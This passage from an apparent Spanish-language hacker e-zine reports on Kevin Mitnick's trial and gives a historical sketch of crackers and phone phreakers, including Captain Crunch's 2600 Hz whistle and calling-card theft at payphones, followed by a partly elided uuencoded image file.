Se supone que los daños causados por Mitnick en los dos años y medio durante los cuales fue un fugitivo suman millones de dolares, especialmente por el software robado y las inversiones que debieron realizar las empresas para proteger sus sistemas. El asistente del fiscal David Schindler dijo que Mitnick -quien actualmente tiene 33 años- seria probablemente sentenciado a "muchos años" si es encontrado culpable, negandose, sin embargo, a ser mas especifico, bajo el argumento de que se trata de un area legal muy nueva. Todos los cargos bajo los cuales ha sido acusado Mitnick podrian suponerle mas de doscientos años de prision si es declarado culpable de todos ellos.
Ya en abril de este año el famoso hacker habia sido declarado culpable por un jurado de Carolina del Norte por el uso del quince numeros de telefonos celulares robados para llamar a bases de datos electronicas. Igualmente se le condeno por haber violado el regimen de libertad condicional al que estaba sometido luego de ser encontrado culpable de penetrar ilegalmente en sistemas de informacion de corporaciones de informatica.
Mitnick: hacker, cracker y phone phreaker
La definicion de un cracker es alguien que trata de violar el acceso a un sistema adquiriendo passwords. La mayoria de los crackers son adolescentes nada bondadosos y que buscan dar sus golpes destruyendo o alterando la data de un sistema. Tienden a unirse en grupos muy pequeños, secretos y cerrados al contrario de los inmensos, abierto y policulturales hackers.
Se espera que un verdadero hacker haga algo de crackin jugueton y conozca muchas de las tecnicas basicas, pero cualquiera que pase de la etapa de larva puede caer en la tentacion y, debido a su creciente deseo de realizar algo por razones inmediatas, benignas y practicas, no vea nada de malo en invadir cierta seguridad y privacidad para poder lograr una meta.
Para el cracker el invadir un sistema no requiere de misteriosos estados de iluminacion mental, pero si mucha persistencia y la testaruda repeticion de trucos bien conocidos en los puntos debiles de un sistema, tratan de descubrir informacion clasificada hurgando al azar y con ciega persistencia.
Suele decirse que los crackers son solo hackers mediocres y que su nivel de educacion e inteligencia sobre un sistema es menor.
Los phone phreaker son los mas famosos en los medios de comunicacion por los desastres que han hecho a traves de los años. En los años 60 ya existian los Phone Phreaks y la gran victima era AT&T. Uno de los mas famosos Phone Phreaks de esa epoca era John Draper, alias Captain Crunch (http://www.fc.net/phrack.html). El descubrio que modificando una caja de cereal podia producir el silbido que simulaba un tono de 2600 Hz para desbloquear el acceso a una troncal y poder hacer llamadas internacionales gratis.
Hace algun tiempo el hacer phreaking fue una actividad semi-respetable dentro de la comunidad hacker; habia un acuerdo de caballeros donde el hacer phreaking era bien visto como juego intelectual y como una forma de exploracion, pero el robo de servicios era tabu. La modernizacion de las redes hizo necesario que los phreakers utilizaran tecnicas menos eticas, como robar numeros de calling cards: los obtenian colocandose cerca de algun telefono publico y memorizando el numero de tarjeta que marcaba un usuario descuidado, una vez obtenido el numero y la clave la informacion era esparcida de tal manera que en un caso se llegaron a realizar 600 llamadas internacionales en dos minutos antes de que los operadores de seguridad del sistema la cancelaran.
RareGaZz@Bigfoot.com
Como ven... me encanta el uuencode
section 1 of uuencode 5.25 of file kevin.jpg
by R.E.M.
begin 644 kevin.jpg
M_]C_X``02D9)1@`!`0$!+`$L``#_VP!#``4#!`0$`P4$!`0%!04&!PP(!P<'
M!P\+"PD,$0\2$A$/$1$3%AP7$Q0:%1$1&"$8&AT='Q\?$Q<B)"(>)!P>'Q[_
...
MDXX`4XROXX'Y5;HQ0'*BC%;0Q6Z1+$P3>"%)R00<Y)SZBF?8+63[0&A8>;]\
MECSR3QSQSSQCFM"B@.5$5K&D4*I$I1`.%-3&BB@:5@HHHH&%%%%`!1110`44
944`%%%%`!1110`4444`%%%%`!1110!__V1__
`
end
sum -r/size 11025/38442 section (from "begin" to "end")
sum -r/size 31782/27880 entire input file